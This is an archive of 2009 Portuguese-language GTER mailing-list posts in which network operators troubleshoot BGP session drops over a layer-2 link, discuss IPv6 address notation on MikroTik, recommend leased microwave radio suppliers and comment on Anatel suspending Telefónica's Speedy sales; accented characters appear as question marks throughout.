Guilherme de Freitas Figueiredo - gui at maniacs.com.br - > http://gui.maniacs.com.br > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From gustkiller at gmail.com Fri Jun 19 22:48:13 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Fri, 19 Jun 2009 22:48:13 -0300 Subject: [GTER] Queda Protocolo BGP In-Reply-To: <2f26b3450906191610g15a74d3foaac473de0f09ff28@mail.gmail.com> References: <9c48850e0906191347j4d857eb7gc3aa6c97c6ba8b04@mail.gmail.com> <2f26b3450906191610g15a74d3foaac473de0f09ff28@mail.gmail.com> Message-ID: <276fbe8b0906191848u33ada296gaa71b74350af7d65@mail.gmail.com> Complementando o posto do colega, verifique se alguma politica de QoS est? deixando o tr?fego BGP em uma vala comum. J? vi problemas em que um QoS errado estava dropando pacotes do BGP quando a utiliza??o do link estava muito alta. 2009/6/19 Marcio Miguel > > Este seus circuitos L2 suportam MTU maior que 1500 Bytes ? Uma Vlan 802.1Q > utiliza 4 bytes a mais, e na hora dos updates isto pode causar problemas. > Tente pingar as interfaces das filiais com pacotes de tamanho maior de 1500 > bytes a partir de seu roteador. Verifique tamb?m se os hold-timers (e > demais > timers) est?o com valores iguais em todos os pontos. J? vi problemas tamb?m > com ARP expirados, tive at? de for??-los estaticamente. > Tudo isso assumindo que as camadas inferiores, inclusive as negocia??es das > ethernets est?o realmente corretas e que os circuitos estejam com menos de > 70 % de utiliza??o. > > M?rcio > > > 2009/6/19 Guilherme de Freitas Figueiredo > > > Senhores, > > > > Fa?o uma interliga??o em layer2 para um cliente , interligo 2 filiais > > fechando em uma matriz , cada uma em um vlan diferente. > > N?o tenho relat?rio de perdas de pacote ( gero graficos das perdas > > utilizando smokeping ) , as negocia??es das ethernets est?o OK. > > N?o tenho colis?es e coloquei um equipamento meu na matriz e outro na > > filial fechando bgp. > > > > Resumo: a sess?o bgp do cliente cai de N em N minutos , a minha sess?o > bgp > > permanece UP o cliente utiliza cisco para fechar o bgp , as sess?es caem > > nas > > 2 filiais ao mesmo tempo , e voltam depois do hold time. > > > > Alguem tem alguma ideia do que pode ser ? > > > > -- > > []s! > > > > -- > > Guilherme de Freitas Figueiredo - gui at maniacs.com.br - > > http://gui.maniacs.com.br > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From wagnerfurquim at gmail.com Fri Jun 19 18:45:10 2009 From: wagnerfurquim at gmail.com (Wagner Furquim) Date: Fri, 19 Jun 2009 18:45:10 -0300 Subject: [GTER] OFF - Fornecedor Message-ID: Boa Tarde a todos, Estou com a necessidade de fechar dois enlaces de 42km cada, com radio e uma largura de banda de 150M a 300Mbits, gostaria de informa??es sobre fornecedores que possam alugar os equipamentos, e se algum de vcs possuem cases nessas situa??es. Agrade?o Antecipadamente, -- Wagner A. Furquim Jr CSCO10797322 Cel: (18) 8121.4415 From tobias at netconsultoria.com.br Fri Jun 19 18:33:33 2009 From: tobias at netconsultoria.com.br (Tobias P. Santos) Date: Fri, 19 Jun 2009 18:33:33 -0300 Subject: [GTER] Queda Protocolo BGP In-Reply-To: <9c48850e0906191347j4d857eb7gc3aa6c97c6ba8b04@mail.gmail.com> References: <9c48850e0906191347j4d857eb7gc3aa6c97c6ba8b04@mail.gmail.com> Message-ID: <4A3C042D.8010907@netconsultoria.com.br> Caso estiver usando QinQ, pode ser algo relacionado ao MTU/MSS. Guilherme de Freitas Figueiredo wrote: > Senhores, > > Fa?o uma interliga??o em layer2 para um cliente , interligo 2 filiais > fechando em uma matriz , cada uma em um vlan diferente. > N?o tenho relat?rio de perdas de pacote ( gero graficos das perdas > utilizando smokeping ) , as negocia??es das ethernets est?o OK. > N?o tenho colis?es e coloquei um equipamento meu na matriz e outro na > filial fechando bgp. > > Resumo: a sess?o bgp do cliente cai de N em N minutos , a minha sess?o bgp > permanece UP o cliente utiliza cisco para fechar o bgp , as sess?es caem nas > 2 filiais ao mesmo tempo , e voltam depois do hold time. > > Alguem tem alguma ideia do que pode ser ? > > From rubensk at gmail.com Sat Jun 20 02:06:57 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Sat, 20 Jun 2009 02:06:57 -0300 Subject: [GTER] OFF - Fornecedor In-Reply-To: References: Message-ID: <6bb5f5b10906192206y47a8947eq3237b0a23f763812@mail.gmail.com> 42 km ? uma dist?ncia fact?vel para r?dios de faixa estreita operando em 6 a 8 GHz; temos meia-d?zia desses funcionando bem. Cada portadora operando nessa faixa vai conseguir 150 a 170 Mbps, mas para 300 Mbps voc? pode usar duas portadoras em polariza??o cruzada e com um ?nico canal, um chassi de r?dio com 2 r?dios em paralelo obter 300 Mbps. Fornecedores t?picos desses equipamentos s?o a Ceragon e a SIAE, mas n?o sei como seria a disposi??o deles em alugar(leasing banc?rio talvez equacione essa quest?o). A Gigacom aluga ? pode ser uma op??o. Um componente caro dessa solu??o e que n?o pode ser feito leasing s?o as antenas, que para essa dist?ncia possivelmente ser?o de 1.80m, com chance de talvez ser um 1.20m ou 2.40m de um dos lados conforme a predi??o clim?tica recomendar. Rubens 2009/6/19 Wagner Furquim : > ?Boa Tarde a todos, > > > ? ? Estou com a necessidade de fechar dois enlaces de 42km cada, com radio > e uma largura de banda de 150M a 300Mbits, gostaria de informa??es sobre > fornecedores que possam alugar os equipamentos, e se algum de vcs possuem > cases nessas situa??es. > > > ? ?Agrade?o Antecipadamente, > > > > > -- > Wagner A. Furquim Jr > CSCO10797322 > Cel: (18) 8121.4415 > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From alexandre at onda.psi.br Sat Jun 20 02:21:40 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Sat, 20 Jun 2009 02:21:40 -0300 Subject: [GTER] OFF - Fornecedor In-Reply-To: <6bb5f5b10906192206y47a8947eq3237b0a23f763812@mail.gmail.com> References: <6bb5f5b10906192206y47a8947eq3237b0a23f763812@mail.gmail.com> Message-ID: <4A3C71E4.5050900@onda.psi.br> a Avvio aluga radios.. a gama de marcas disponiveis ? grande :) inclusive eles fazem todo processo.. montagem, projeto, licenciamento da frequencia.. etc etc !! www.avvio.com.br abra?o ! Rubens Kuhl wrote: > 42 km ? uma dist?ncia fact?vel para r?dios de faixa estreita operando > em 6 a 8 GHz; temos meia-d?zia desses funcionando bem. > Cada portadora operando nessa faixa vai conseguir 150 a 170 Mbps, mas > para 300 Mbps voc? pode usar duas portadoras em polariza??o cruzada e > com um ?nico canal, um chassi de r?dio com 2 r?dios em paralelo obter > 300 Mbps. > > Fornecedores t?picos desses equipamentos s?o a Ceragon e a SIAE, mas > n?o sei como seria a disposi??o deles em alugar(leasing banc?rio > talvez equacione essa quest?o). A Gigacom aluga ? pode ser uma op??o. > > Um componente caro dessa solu??o e que n?o pode ser feito leasing s?o > as antenas, que para essa dist?ncia possivelmente ser?o de 1.80m, com > chance de talvez ser um 1.20m ou 2.40m de um dos lados conforme a > predi??o clim?tica recomendar. > > > Rubens > > > > 2009/6/19 Wagner Furquim : > >> Boa Tarde a todos, >> >> >> Estou com a necessidade de fechar dois enlaces de 42km cada, com radio >> e uma largura de banda de 150M a 300Mbits, gostaria de informa??es sobre >> fornecedores que possam alugar os equipamentos, e se algum de vcs possuem >> cases nessas situa??es. >> >> >> Agrade?o Antecipadamente, >> >> >> >> >> -- >> Wagner A. Furquim Jr >> CSCO10797322 >> Cel: (18) 8121.4415 >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From mcosta at mcosta.eng.br Sat Jun 20 08:40:14 2009 From: mcosta at mcosta.eng.br (Marcelo Costa) Date: Sat, 20 Jun 2009 08:40:14 -0300 Subject: [GTER] OFF - Fornecedor In-Reply-To: Message-ID: Prezado Wagner, A Gigacom possui os r?dios e fazem aluguel dos mesmos. Att, Eng. Marcelo Costa Em 20/6/2009, "Wagner Furquim" escreveu: > Boa Tarde a todos, > > > Estou com a necessidade de fechar dois enlaces de 42km cada, com radio >e uma largura de banda de 150M a 300Mbits, gostaria de informa??es sobre >fornecedores que possam alugar os equipamentos, e se algum de vcs possuem >cases nessas situa??es. > > > Agrade?o Antecipadamente, > > > > >-- >Wagner A. Furquim Jr >CSCO10797322 >Cel: (18) 8121.4415 >-- >gter list https://eng.registro.br/mailman/listinfo/gter > >-- >Esta mensagem foi verificada pelo sistema de antiv?rus e > acredita-se estar livre de perigo. > From gustavo.albuquerque at gmail.com Sat Jun 20 10:02:25 2009 From: gustavo.albuquerque at gmail.com (Andre Gustavo de C. Albuquerque) Date: Sat, 20 Jun 2009 10:02:25 -0300 Subject: [GTER] Queda Protocolo BGP In-Reply-To: <4A3C042D.8010907@netconsultoria.com.br> References: <9c48850e0906191347j4d857eb7gc3aa6c97c6ba8b04@mail.gmail.com> <4A3C042D.8010907@netconsultoria.com.br> Message-ID: Habilite Path MTU Discovery (PMTU-D) nas duas pontas e as quest?es de MTU s?o eliminadas. Alguns ponteiros com exemplos de como configurar essa funcionalidade para BGP, em um roteador Cisco, podem ser encontrados em http://www.cisco.com/en/US/docs/ios/12_2sb/feature/guide/sbbgpmtu.html e http://www.cisco.com/en/US/docs/ios/iproute/configuration/guide/irp_bgp_neighor.html#wp1054150 Sei de outras implementa??es de BGP t?m essa funcionalidade, j? que ? um problema cl?ssico. Uma busca por bgp path mtu discovery no google retornar? alguns ponteiros interessantes. Abs, Gustavo Albuquerque 2009/6/19 Tobias P. Santos > Caso estiver usando QinQ, pode ser algo relacionado ao MTU/MSS. > > > Guilherme de Freitas Figueiredo wrote: > >> Senhores, >> >> Fa?o uma interliga??o em layer2 para um cliente , interligo 2 filiais >> fechando em uma matriz , cada uma em um vlan diferente. >> N?o tenho relat?rio de perdas de pacote ( gero graficos das perdas >> utilizando smokeping ) , as negocia??es das ethernets est?o OK. >> N?o tenho colis?es e coloquei um equipamento meu na matriz e outro na >> filial fechando bgp. >> >> Resumo: a sess?o bgp do cliente cai de N em N minutos , a minha sess?o >> bgp >> permanece UP o cliente utiliza cisco para fechar o bgp , as sess?es caem >> nas >> 2 filiais ao mesmo tempo , e voltam depois do hold time. >> >> Alguem tem alguma ideia do que pode ser ? >> >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From alexandre at onda.psi.br Sat Jun 20 17:15:27 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Sat, 20 Jun 2009 17:15:27 -0300 Subject: [GTER] subnet ipv6 Message-ID: <4A3D435F.1060205@onda.psi.br> Caros, estou ativando ipv6 na rede de um cliente e me aconteceu algo estranho: tenho 2001:12ac::/32 .. entao configure 3 subnets: 2001:12ac::/64 2001:12ac:0:1::/64 2001:12ac:0:2::/64 esta divisao esta correta, acredito eu.. bom.. comecei usando 2001:12ac::/64..... nos roteadores e servidores diretamente conectados ao core... os 2 outros blocos, apontei o next hop para 2001:12ac::5 ... quando vou configurar o ip 2001:12ac:0:1::a/64 na interface do MIKROTIK .. ele muda para: 2001:12ac::1:0:0:0:a/64 pergunta: eu que estou errando ? ou ? o mikrotik ?! -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From edinilson at atinet.com.br Sat Jun 20 19:24:15 2009 From: edinilson at atinet.com.br (edinilson at atinet.com.br) Date: Sat, 20 Jun 2009 19:24:15 -0300 Subject: [GTER] =??Q?Venda do Speedy ser=E1 suspensa pela Anatel?= Message-ID: <10483b6c2eb7b0cb25f2a5c34726077a@atinet.com.br> http://idgnow.uol.com.br/telecom/2009/06/19/anatel-vai-proibir-telefonica-de-vender-assinaturas-do-speedy/ From danton at inexo.com.br Sat Jun 20 20:07:05 2009 From: danton at inexo.com.br (Danton Nunes) Date: Sat, 20 Jun 2009 20:07:05 -0300 (BRT) Subject: [GTER] subnet ipv6 In-Reply-To: <4A3D435F.1060205@onda.psi.br> References: <4A3D435F.1060205@onda.psi.br> Message-ID: On Sat, 20 Jun 2009, Alexandre J. Correa - Onda Internet wrote: > quando vou configurar o ip 2001:12ac:0:1::a/64 na interface do MIKROTIK .. > ele muda para: 2001:12ac::1:0:0:0:a/64 > > pergunta: eu que estou errando ? ou ? o mikrotik ?! acho que ningu?m. para mim estas duas coisas s?o absolutamente equivalentes. expandindo tua nota??o: 2001:12ac:0:1::a = 2001:12ac:0:1:0:0:0:a e a do microtique: 2001:12ac::1:0:0:0:a = 2001:12ac:0:1:0:0:0:a ou seja, exatamente a mesma coisa. claro que a nota??o do microtaque ? bem mais besta. From juliano at cyberweb.com.br Sat Jun 20 21:56:16 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Sat, 20 Jun 2009 21:56:16 -0300 Subject: [GTER] subnet ipv6 In-Reply-To: <4A3D435F.1060205@onda.psi.br> References: <4A3D435F.1060205@onda.psi.br> Message-ID: <4A3D8530.6090903@cyberweb.com.br> Pela logica do microtik parece que ele simplifica o primeiro grupo de zeros que ele encontra para :: ... independente se depois vem um grupo maior de zeros. Teoricamente nao est? errado. Juliano Alexandre J. Correa - Onda Internet escreveu: > Caros, > estou ativando ipv6 na rede de um cliente e me aconteceu algo estranho: > > tenho 2001:12ac::/32 .. entao configure 3 subnets: > > 2001:12ac::/64 > 2001:12ac:0:1::/64 > 2001:12ac:0:2::/64 > > esta divisao esta correta, acredito eu.. bom.. comecei usando > 2001:12ac::/64..... nos roteadores e servidores diretamente conectados > ao core... > os 2 outros blocos, apontei o next hop para 2001:12ac::5 ... > > quando vou configurar o ip 2001:12ac:0:1::a/64 na interface do > MIKROTIK .. ele muda para: 2001:12ac::1:0:0:0:a/64 > > pergunta: eu que estou errando ? ou ? o mikrotik ?! > > From gustkiller at gmail.com Sat Jun 20 18:28:19 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sat, 20 Jun 2009 18:28:19 -0300 Subject: [GTER] subnet ipv6 In-Reply-To: <4A3D435F.1060205@onda.psi.br> References: <4A3D435F.1060205@onda.psi.br> Message-ID: <276fbe8b0906201428p385751ddt5b71a2142a9d471e@mail.gmail.com> Na verdade da no mesmo. O mikrotik esta comprimindo a primeira repeti??o de zeros ao inves da ultima... 2009/6/20 Alexandre J. Correa - Onda Internet > Caros, > estou ativando ipv6 na rede de um cliente e me aconteceu algo estranho: > > tenho 2001:12ac::/32 .. entao configure 3 subnets: > > 2001:12ac::/64 > 2001:12ac:0:1::/64 > 2001:12ac:0:2::/64 > > esta divisao esta correta, acredito eu.. bom.. comecei usando > 2001:12ac::/64..... nos roteadores e servidores diretamente conectados ao > core... > os 2 outros blocos, apontei o next hop para 2001:12ac::5 ... > > quando vou configurar o ip 2001:12ac:0:1::a/64 na interface do MIKROTIK .. > ele muda para: 2001:12ac::1:0:0:0:a/64 > > pergunta: eu que estou errando ? ou ? o mikrotik ?! > > > -- > Sds. > > Alexandre Jeronimo Correa > > Onda Internet > www.onda.net.br > > IPV6 Ready ! > www.ipv6.onda.net.br > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From tukso.antartiko at gmail.com Sun Jun 21 17:42:17 2009 From: tukso.antartiko at gmail.com (Tukso Antartiko) Date: Sun, 21 Jun 2009 17:42:17 -0300 Subject: [GTER] =??Q?Venda do Speedy ser=E1 suspensa pela Anatel?= In-Reply-To: <10483b6c2eb7b0cb25f2a5c34726077a@atinet.com.br> References: <10483b6c2eb7b0cb25f2a5c34726077a@atinet.com.br> Message-ID: A parte que achei mais interessante foi em: http://www.estadao.com.br/noticias/economia,venda-do-speedy-deve-ser-suspensa,390102,0.htm "Os problemas de abril e de maio foram muito parecidos. A Telef?nica enfrentou instabilidade em seus servidores de nome de dom?nio (DNS, na sigla em ingl?s). (...) O laudo apontou como causa "a??es deliberadas e de origem externa" e ***problemas de software*** e de ***configura??o de sistemas***. " Isso que d? quebrar RFC para alterar a finalidade do servi?o. ? o mesmo que a companhia de tr?nsito urbano substituir a sinaliza??o de tr?fego por out-doors, que subentendem que se fulano est? na contra-m?o ele n?o precisa ser alertado por uma placa indicativa universal mas precisa mesmo do an?ncio de um GPS, porque lhe parece mais interessante ganhar alguns trocados do anunciante ? despeito de quebrar a previsibilidade do servi?o para o qual foi originalmente contratada. On 6/20/09, edinilson at atinet.com.br wrote: > http://idgnow.uol.com.br/telecom/2009/06/19/anatel-vai-proibir-telefonica-de-vender-assinaturas-do-speedy/ > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From tukso.antartiko at gmail.com Sun Jun 21 18:35:30 2009 From: tukso.antartiko at gmail.com (Tukso Antartiko) Date: Sun, 21 Jun 2009 18:35:30 -0300 Subject: [GTER] Baixa Performance Link Telefonica In-Reply-To: <4d607e950906180643x2cc2a814g78d969f6fc0a14b7@mail.gmail.com> References: <4A3A43A3.7060904@conectcor.com.br> <4d607e950906180643x2cc2a814g78d969f6fc0a14b7@mail.gmail.com> Message-ID: Tenho um teoria sobre este problema, considerando alguns fatos observados (que n?o sei se valem para todos) - Algumas respostas da telef?nica disseram que o problema envolve um roteador em Santos. - Ap?s o problema ser corrigido (no dito roteador de Santos) algumas horas depois o problema retorna. - O problema se refere ao acesso internacional - Quem est? com problema usa NAT/Proxy Na minha teoria alguma ferramenta autom?tica anti-DOS localizada na entrada internacional da Telef?nica percebe um grande n?mero de pacotes ICMP destinado a determinado IP da rede da telef?nica e, ignorando que se trata de um link de dezenas de mbps com centenas de usu?rios por tr?s, acha que ? um ataque, filtrando todos ICMPs para este IP impedindo que a negocia??o do tamanho do MTU ocorra normalmente, prejudicando assim o tr?fego normal de dados. Desta forma o anti-DOS acaba funcionando como DOS. On 6/18/09, Marcelo Valotta wrote: > Nos aqui usamos as dicas sobre o MTU e conseguimos dar a volta na falha da > telefonica. > O Default era 1500 e baixamos para 1300. > > 2009/6/18 Welisson > >> Pois ?. >> >> Esse ? o problema e ? um chamado atr?s do outro e nunca falam, nada, >> realmente o problema maior ? explicar para o cliente que o problema ? na >> operadora transito nossa. >> Quando v?o criar vergonha na cara e oferecer um servi?o digno? >> From antoniocarlospina at gmail.com Sun Jun 21 19:07:04 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Sun, 21 Jun 2009 19:07:04 -0300 Subject: [GTER] Baixa Performance Link Telefonica In-Reply-To: References: <4A3A43A3.7060904@conectcor.com.br> <4d607e950906180643x2cc2a814g78d969f6fc0a14b7@mail.gmail.com> Message-ID: <86b352050906211507r787c50a2ja1b171352be5a15@mail.gmail.com> Tukso, A teoria seria perfeita se n?s n?o tiv?ssemos visto o problema em redes sem NAT/Proxy. Por outro lado, pode ser mais de 1 problema... Abs 2009/6/21 Tukso Antartiko > Tenho um teoria sobre este problema, considerando alguns fatos > observados (que n?o sei se valem para todos) > > - Algumas respostas da telef?nica disseram que o problema envolve um > roteador em Santos. > - Ap?s o problema ser corrigido (no dito roteador de Santos) algumas > horas depois o problema retorna. > - O problema se refere ao acesso internacional > - Quem est? com problema usa NAT/Proxy > > Na minha teoria alguma ferramenta autom?tica anti-DOS localizada na > entrada internacional da Telef?nica percebe um grande n?mero de > pacotes ICMP destinado a determinado IP da rede da telef?nica e, > ignorando que se trata de um link de dezenas de mbps com centenas de > usu?rios por tr?s, acha que ? um ataque, filtrando todos ICMPs para > este IP impedindo que a negocia??o do tamanho do MTU ocorra > normalmente, prejudicando assim o tr?fego normal de dados. Desta forma > o anti-DOS acaba funcionando como DOS. > > > On 6/18/09, Marcelo Valotta wrote: > > Nos aqui usamos as dicas sobre o MTU e conseguimos dar a volta na falha > da > > telefonica. > > O Default era 1500 e baixamos para 1300. > > > > 2009/6/18 Welisson > > > >> Pois ?. > >> > >> Esse ? o problema e ? um chamado atr?s do outro e nunca falam, nada, > >> realmente o problema maior ? explicar para o cliente que o problema ? na > >> operadora transito nossa. > >> Quando v?o criar vergonha na cara e oferecer um servi?o digno? > >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From danton at inexo.com.br Sun Jun 21 20:36:41 2009 From: danton at inexo.com.br (Danton Nunes) Date: Sun, 21 Jun 2009 20:36:41 -0300 (BRT) Subject: [GTER] Baixa Performance Link Telefonica In-Reply-To: References: <4A3A43A3.7060904@conectcor.com.br> <4d607e950906180643x2cc2a814g78d969f6fc0a14b7@mail.gmail.com> Message-ID: On Sun, 21 Jun 2009, Tukso Antartiko wrote: > - Algumas respostas da telef?nica disseram que o problema envolve um > roteador em Santos. o 'roteador em Santos' vai entrar para o folclore da internet. > Na minha teoria alguma ferramenta autom?tica anti-DOS localizada na > entrada internacional da Telef?nica percebe um grande n?mero de > pacotes ICMP destinado a determinado IP da rede da telef?nica e, > ignorando que se trata de um link de dezenas de mbps com centenas de > usu?rios por tr?s, acha que ? um ataque, filtrando todos ICMPs para > este IP impedindo que a negocia??o do tamanho do MTU ocorra > normalmente, prejudicando assim o tr?fego normal de dados. Desta forma > o anti-DOS acaba funcionando como DOS. ? uma teoria muito plaus?vel! From mdonada at auroraalimentos.com.br Mon Jun 22 09:58:24 2009 From: mdonada at auroraalimentos.com.br (=?ISO-8859-1?Q?M=E1rcio_Luciano_Donada?=) Date: Mon, 22 Jun 2009 09:58:24 -0300 Subject: [GTER] =?iso-8859-1?q?=5BOFF=5D_Telef=F4nica=2C_complicou!!!?= Message-ID: <4A3F7FF0.70902@auroraalimentos.com.br> Acho que dessa vez complicou [1] [1]. http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00-ANATEL+DETERMINA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html -- M?rcio Luciano Donada Aurora Alimentos - Cooperativa Central Oeste Catarinense Departamento de T.I. From danton at inexo.com.br Mon Jun 22 10:52:16 2009 From: danton at inexo.com.br (Danton Nunes) Date: Mon, 22 Jun 2009 10:52:16 -0300 (BRT) Subject: [GTER] =?iso-8859-1?q?=5BOFF=5D_Telef=F4nica=2C_complicou!!!?= In-Reply-To: <4A3F7FF0.70902@auroraalimentos.com.br> References: <4A3F7FF0.70902@auroraalimentos.com.br> Message-ID: On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > Acho que dessa vez complicou [1] > > [1]. > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00-ANATEL+DETERMINA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > -- sinceramente, eu acho pouco! From marcelo at valotta.com.br Mon Jun 22 11:17:10 2009 From: marcelo at valotta.com.br (Marcelo Valotta) Date: Mon, 22 Jun 2009 11:17:10 -0300 Subject: [GTER] =?iso-8859-1?q?=5BOFF=5D_Telef=F4nica=2C_complicou!!!?= In-Reply-To: References: <4A3F7FF0.70902@auroraalimentos.com.br> Message-ID: <4d607e950906220717y4b71e462yd5cffedc4c51bf94@mail.gmail.com> ? pouco pelo aperto que passamos com nossos clientes, mas sinceramente, j? ? alguma coisa... Marcelo Valotta http://www.yesida.com 2009/6/22 Danton Nunes > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > Acho que dessa vez complicou [1] >> >> [1]. >> >> http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00-ANATEL+DETERMINA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html >> -- >> > > sinceramente, eu acho pouco! > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From rubensk at gmail.com Mon Jun 22 11:42:50 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Mon, 22 Jun 2009 11:42:50 -0300 Subject: [GTER] =?iso-8859-1?q?=5BOFF=5D_Telef=F4nica=2C_complicou!!!?= In-Reply-To: References: <4A3F7FF0.70902@auroraalimentos.com.br> Message-ID: <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> http://www.urbandictionary.com/define.php?term=cluebat Rubens 2009/6/22 Danton Nunes > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > >> Acho que dessa vez complicou [1] >> >> [1]. >> http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00-ANATEL+DETERMINA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html >> -- > > sinceramente, eu acho pouco! > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter From gui at maniacs.com.br Mon Jun 22 13:14:28 2009 From: gui at maniacs.com.br (Guilherme de Freitas Figueiredo) Date: Mon, 22 Jun 2009 13:14:28 -0300 Subject: [GTER] Queda Protocolo BGP In-Reply-To: References: <9c48850e0906191347j4d857eb7gc3aa6c97c6ba8b04@mail.gmail.com> <4A3C042D.8010907@netconsultoria.com.br> Message-ID: <9c48850e0906220914xf155643jbad234faf587b2f8@mail.gmail.com> Senhores, Boa tarde! Agrade?o a todos pela ajuda. Acham que se tiver algum STP ( Spaning Tree ) ativo em um switch no meio desse enlace l2 poderia ocasionar a queda do protocolo ? Abra?os! 2009/6/20 Andre Gustavo de C. Albuquerque > Habilite Path MTU Discovery (PMTU-D) nas duas pontas e as quest?es de MTU > s?o eliminadas. > Alguns ponteiros com exemplos de como configurar essa funcionalidade para > BGP, em um roteador Cisco, podem ser encontrados em > http://www.cisco.com/en/US/docs/ios/12_2sb/feature/guide/sbbgpmtu.html e > > http://www.cisco.com/en/US/docs/ios/iproute/configuration/guide/irp_bgp_neighor.html#wp1054150 > > Sei de outras implementa??es de BGP t?m essa funcionalidade, j? que ? um > problema cl?ssico. Uma busca por bgp path mtu discovery no google retornar? > alguns ponteiros interessantes. > > Abs, Gustavo Albuquerque > > 2009/6/19 Tobias P. Santos > > > Caso estiver usando QinQ, pode ser algo relacionado ao MTU/MSS. > > > > > > Guilherme de Freitas Figueiredo wrote: > > > >> Senhores, > >> > >> Fa?o uma interliga??o em layer2 para um cliente , interligo 2 filiais > >> fechando em uma matriz , cada uma em um vlan diferente. > >> N?o tenho relat?rio de perdas de pacote ( gero graficos das perdas > >> utilizando smokeping ) , as negocia??es das ethernets est?o OK. > >> N?o tenho colis?es e coloquei um equipamento meu na matriz e outro na > >> filial fechando bgp. > >> > >> Resumo: a sess?o bgp do cliente cai de N em N minutos , a minha sess?o > >> bgp > >> permanece UP o cliente utiliza cisco para fechar o bgp , as sess?es caem > >> nas > >> 2 filiais ao mesmo tempo , e voltam depois do hold time. > >> > >> Alguem tem alguma ideia do que pode ser ? > >> > >> > >> > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- []s! -- Guilherme de Freitas Figueiredo - gui at maniacs.com.br - http://gui.maniacs.com.br From gustavo at nexthop.com.br Mon Jun 22 13:26:59 2009 From: gustavo at nexthop.com.br (Gustavo Rodrigues Ramos) Date: Mon, 22 Jun 2009 13:26:59 -0300 Subject: [GTER] Queda Protocolo BGP In-Reply-To: <9c48850e0906220914xf155643jbad234faf587b2f8@mail.gmail.com> References: <9c48850e0906191347j4d857eb7gc3aa6c97c6ba8b04@mail.gmail.com> <4A3C042D.8010907@netconsultoria.com.br> <9c48850e0906220914xf155643jbad234faf587b2f8@mail.gmail.com> Message-ID: <73d1f88a0906220926g2fa1a03dm39b4a59cd225921@mail.gmail.com> Ol?, 2009/6/22 Guilherme de Freitas Figueiredo : > > ?Acham que se tiver algum STP ( Spaning Tree ) ativo em um switch no meio > desse enlace l2 poderia ocasionar a queda do protocolo ? Se houver o rec?lculo do stp e n?o for um rapid-stp, ent?o pode sim (lembrando que vai depender tamb?m dos timers configurados no seu BGP). Gustavo. From francisco.henrique at gmail.com Mon Jun 22 11:53:42 2009 From: francisco.henrique at gmail.com (Francisco Henrique) Date: Mon, 22 Jun 2009 11:53:42 -0300 Subject: [GTER] =?iso-8859-1?q?=5BOFF=5D_Telef=F4nica=2C_complicou!!!?= In-Reply-To: <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> References: <4A3F7FF0.70902@auroraalimentos.com.br> <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> Message-ID: <138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com> Infelizmente, o Velox est? indo pelo mesmo caminho 2009/6/22 Rubens Kuhl > http://www.urbandictionary.com/define.php?term=cluebat > > > Rubens > > 2009/6/22 Danton Nunes > > > > On Mon, 22 Jun 2009, M?rcio Luciano Donada wrote: > > > >> Acho que dessa vez complicou [1] > >> > >> [1]. > >> > http://g1.globo.com/Noticias/Tecnologia/0,,MUL1202787-6174,00-ANATEL+DETERMINA+SUSPENSAO+DE+COMERCIALIZACAO+DO+SPEEDY.html > >> -- > > > > sinceramente, eu acho pouco! > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- ============= Francisco Henrique C. Ferreira francisco.henrique at gmail.com UIN: 5328093 Linux Registered User #368514 From eschoedler at viavale.com.br Mon Jun 22 14:36:12 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Mon, 22 Jun 2009 14:36:12 -0300 Subject: [GTER] =?iso-8859-1?q?=5BOFF=5D_Telef=F4nica=2C_complicou!!!?= References: <4A3F7FF0.70902@auroraalimentos.com.br> <6bb5f5b10906220742h53a9ddadoccc70f7e6a5c7a9e@mail.gmail.com> <138bd4780906220753jc521e5ap4c553be30c5faac4@mail.gmail.com> Message-ID: <1D4EFC657D314B9198771CB00C512FAF@admgaz.com.br> Ao menos j? existe um precedente! Abra?o, Eduardo. ----- Original Message ----- From: "Francisco Henrique" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Monday, June 22, 2009 11:53 AM Subject: Re: [GTER] [OFF] Telef?nica, complicou!!! Infelizmente, o Velox est? indo pelo mesmo caminho 